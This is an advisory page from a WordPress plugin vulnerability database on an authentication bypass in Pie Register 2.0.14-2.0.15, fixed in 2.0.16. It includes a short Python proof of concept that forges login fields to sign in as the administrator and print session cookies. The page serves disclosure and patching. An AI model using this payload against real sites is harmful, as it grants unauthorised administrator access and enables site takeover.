Pie Register 2.0.14-2.0.15 – Privilege Escalation | Plugin Vulnerabilities

Description

User input is not validated correctly when accepting a login request via the Pie Register plugin. It is possible to manipulate posted variables in order to login using an arbitrary User ID (such as 1, for the default Administrative account).

Proof of Concept

import requests

target="http://localhost"
payload = {
        "log":"a",
        "pwd":"a",
        "social_site":"true",
        "user_id_social_site":1

}
r = requests.post(target, data=payload, allow_redirects=False)
print requests.utils.dict_from_cookiejar(r.cookies)

Affects Plugins

Fixed in 2.0.16

References

URL

https://g0blin.co.uk/g0blin-00041/

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Submitter

James Hooker

Submitter website

https://research.g0blin.co.uk

Submitter twitter

Verified

No

WPVDB ID

f30f77bd-2e6e-45cd-ac02-c9d3985844da

Timeline

Publicly Published

2015-05-04 (about 11 years ago)

Added

2015-05-04 (about 11 years ago)

Last Updated

2019-10-21 (about 6 years ago)

Other

Published

Title

Published

2025-04-09

Title

SureTriggers < 1.0.79 - Unauthenticated Admin User Creation

Published

2016-03-22

Title

OptinMonster <= 1.1.4.5 - Execution of Arbitrary Shortcodes

Published

2014-08-01

Title

WordPress 3.7.1 & 3.8 - Cleartext Admin Credentials Disclosure

Published

2025-05-08

Title

PSW Front-end Login & Registration <= 1.12 - Authentication Bypass

Published

2026-01-28

Title

Video Conferencing with Zoom API < 4.6.6 - Unauthenticated SDK Signature Generation